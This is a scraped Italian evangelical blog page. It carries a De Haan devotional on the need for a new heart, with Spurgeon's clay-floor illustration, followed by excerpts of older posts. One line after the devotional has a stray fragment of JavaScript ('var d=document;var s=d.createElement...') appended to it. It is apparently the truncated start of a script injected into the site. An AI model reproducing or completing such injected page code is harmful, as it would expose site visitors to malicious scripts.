E’ necessario un pavimento nuovo

di M.R. DE HANN  –  ”E vi darò un cuor nuovo”. Ezechiele  36:26   –   Il messaggio della redenzione non è “miglioramento”, bensì “rinnovamento”. Paolo dice: “Se alcuno è in Cristo, è una nuova creatura”, (2 Cor.  5:17). La nuova nascita non è un miglioramento del vecchio uomo ma una nuova crea­zione. Non si tratta quindi di una riverniciatura. La natura del vecchio Adamo è così irrimediabilmente corrotta che Dio stesso non vuol cercare di ripararla o di migliorarla ma insiste perché si butti completamente via come rot­tame  per fare un uomo nuovo. Gesù dice: “Quel che è nato dalla carne, è carne; e quel che è nato dallo Spirito, è spirito. Non ti meravigliare se t’ho detto: Bisogna che nasciate di nuovo,, (Giovanni 3:6-7). La vecchia natura, che hai ricevuto alla nascita naturale, è senza speranza e migliorarla è più pericoloso che lasciarla nel suo stato d’ignoranza e di roz­zezza. Quanto più noi lavoriamo sul ’’vecchio uomo”, tanto più la vecchia natura viene contraffatta. Sai perché il pec­catore deve essere rigenerato? Perché alla sua prima na­scita tutto era a rovescio. Difatti è stato partorito con la parte superiore in basso. Il bambino nasce con la testa sotto e i piedi sopra. L’uomo viene al mondo con le spalle volte al cielo. Ma nella nuova nascita siamo trasformati e generati con la testa nella posizione giusta.

Spurgeon narra di un missionario che visitò la capanna di un indigeno provando grande disgusto davanti allo spor­co pavimento sul quale bisognava camminare e sedersi. Egli consigliò di strofinarne la superficie con acqua e sa­pone. Ma l’indigeno rispose: “Ciò non farebbe altro che peggiorare la cosa. Vedi, il pavimento è fatto di argilla indu­rita e seccata. Se sopra ci metti acqua, diventa fango. Quanto più cerchi di lavarlo, tanto più diventa peggiore”.  Già, nella capanna ci voleva qualcos’altro che un pavimento di terra. – Così accade anche col cuore umano: esso è duro e secco e nulla gli può giovare. L’uomo ha bisogno d’un cuore nuovo. Dobbiamo nascere dall’alto!

O Signore, nella tua grande misericordia scendi presto dal cielo.
Scrivi il tuo nome nel mio cuore nuovo, il nuovo nome del tuo amore.
Charles Wesley

Rifletti: La Bibbia la potremmo paragonare al sapone: chi ha più bisogno del sapone, abitualmente lo usa di meno.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Grandi servitori di Dio: Oswald J. Smith

Il Dr. Oswald J. Smith è nato in una fattoria nella periferia di Odessa, Ontario, l’ 8 novembre 1889. Suo padre era un operatore del telegrafo, e per questo ha trascorso la sua infanzia nelle stazioni ferroviarie. Il tempo trascorso a Mount Albert, Ontario, una piccola e tranquilla cittadina, dove solitamente viveva per brevi periodi, non l’ha mai  dimenticato. Dopo essere diventato famoso, vi tornò a meditare e …
Leggi Tutto

Manda la tua luce e la tua verità

di  Wilhelm Busch   –   Manda la tua luce e la tua verità; mi guidino esse e mi conducano al tuo santo monte e al luogo della tua dimora. (Salmo 43:3)  –   Se leggete l’intero salmo vi renderete conto che il salmista dice continuamente: “Non c’è la faccio più! Non vedo alcuna via d’uscita!” E questo 3000 anni fa. Quanto spesso sento proprio questa frase: “Non c’è la faccio più! …
Leggi Tutto

Comunione o Comunella?

di Felice Leveque  |  Comunella significa associazione, accordo, specialmente per scopi equivoci. Alcuni suoi sinonimi sono combriccola, combutta, cricca. Anche se nel significato ha alcune accezioni positive, di solito il vocabolo è usato in senso negativo. Fanno comunella quei gruppi di persone che tramano alle spalle di qualcuno o di altri …
Leggi Tutto

Dai nostri culti

Pastore  Agostino Masdea  –  Domenica 4 Agosto 2014  –  (Isaia 40:25-31))   Dio è più grande dei nostri problemi, più grande delle nostre paure e dei nostri dubbi, più grande delle circostanze… chi confida in Lui rinnova ogni giorno le sue forze …
Leggi Tutto

LIBERTÀ O LASSISMO?

di AGOSTINO MASDEA  –  (Galati 5:1-5:13)  i) Non sempre è facile gestire la libertà: si può riperdere e ritornare in schiavitù. Esempio: Israele (Giudici 2:10-16) –  A. – CRISTIANESIMO O LASSISMO? a) Cos’è il lassismo? ” – “Dottrina che modifica in forme accomodanti e rilassate il rigore dei precetti cristiani.” (Zingarelli) “Indulgenza verso le norme del cristianesimo.” b) E’ la Religione del ” che male c’è? “! c) …
Leggi Tutto

Grandi inni: "What a Friend we have in Jesus"

QUALE AMICO IN CRISTO ABBIAMO –  di  Joseph Scriven (10 September 1819 – 10 August 1886) –  Joseph Scriven nacque nel 1819 a Dublino, Irlanda,  da genitori benestanti. Si laureò al Trinity College di Dublino.  Da giovane voleva seguire le orme del padre nella Royal Marine, ma la sua salute cagionevole non gli e lo permise.  All’età di venticinque anni, decise di lasciare il suo paese natale ed …
Leggi Tutto

New Age e Cristianesimo

di B. E. Underwood   –   Uno dei più famosi “pseudoevangelisti” del mondo è una donna. Il suo nome è Shirley MacLaine. Il suo “vangelo contraffatto” è quello del movimento New Age (o Nuova Era). Guadagna circa quattro milioni di dollari all’anno propagando la sue fede. L’oggetto dei suoi seminari propagandistici è presentare ai partecipanti una persona che secondo la MacLaine è la più importante del mondo. Questa persona …
Leggi Tutto

LA BIBBIA

Strappata, condannata, bruciata. Odiata, disprezzata, maledetta. Messa in dubbio, guardata con sospetto, criticata. Condannata dagli atei. Schernita dagli empi. Esagerata dai fanatici. Capita ed interpretata male. Oggetto d’infamia e frenesia. Negata nella sua ispirazione divina. EPPURE VIVE Vive – come una lampada per i nostri piedi. Vive – come una luce per i nostri sentieri. Vive – come la porta per il cielo. Vive – come normativa nella …
Leggi Tutto

Dai nostri Culti